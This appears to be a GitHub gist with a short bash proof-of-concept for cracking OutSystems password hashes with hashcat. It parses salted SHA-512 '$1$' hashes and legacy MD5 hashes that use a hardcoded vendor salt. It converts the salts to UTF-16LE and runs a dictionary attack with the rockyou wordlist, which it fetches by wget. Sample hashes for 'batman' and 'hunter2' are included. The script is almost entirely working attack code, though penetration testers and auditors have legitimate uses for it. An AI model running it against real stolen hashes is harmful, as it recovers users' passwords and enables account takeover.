Last active
October 25, 2022 12:39
-
-
Save ykoster/ede364aeb58802da0fc4f0aa262b1dcb to your computer and use it in GitHub Desktop.
Quick 'n Dirty PoC for cracking OutSystems hashes with hashcat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Crack hashes generated by OutSystems (PoC) | |
# batman | |
hash='$1$ms7rBI3MKLalgjmCFwavo5ROC/Cw5C6QXUxwgbUrAHw=131FFFE778BF3BD89911BBA49184A14DAA625B2FA2FA8D2C086BF35FF62539B046768E1885F43A7120199867B7AFAED9A53FD1A7C165CC12C8AE24370A792754' | |
#hash='2A37D95E1EF22207DC6B09B55899B461' | |
# hunter2 | |
#hash='$1$BYi7cMS7AXlNwKz/ozjUu9lhO83DjhNEDz5qPom78lU=2D2DC5245359DCC7F87E1D39E707E7AA1A4476D2346D5441104F29E412BADC64FAF2C6B182AD09B00AB26D5DC794456F7D75288F41E73AB440B2D8A52E3012CA' | |
#hash='A8629A13DC6381CC9F2166C3A36232E3' | |
rockyou='https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt' | |
if [ ! -f rockyou.txt ] | |
then | |
wget "$rockyou" | |
fi | |
function crack() { | |
echo -n "Trying $1..." | |
hashcat --hash-type $2 --hex-salt --quiet "$1" rockyou.txt | |
echo "done" | |
echo | |
hashcat --hash-type $2 --hex-salt --show "$1" | |
} | |
type=${hash:0:3} | |
if [ $type == '$1$' ] | |
then | |
digest=${hash:(-128)} | |
let "saltlen=${#hash}-3-${#digest}" | |
salt=${hash:3:$saltlen} | |
saltutf16hex=`echo -n "$salt" | iconv -f UTF-8 -t UTF-16LE | xxd -ps -u -c 0` | |
crack "$digest:$saltutf16hex" 1730 # sha512(utf16le($pass).$salt) | |
else | |
digest=$hash | |
salt='cdjnes3h4w' | |
saltutf16hex=`echo -n "$salt" | iconv -f UTF-8 -t UTF-16LE | xxd -ps -u -c 0` | |
crack "$digest:$saltutf16hex" 30 # md5(utf16le($pass).$salt) | |
fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment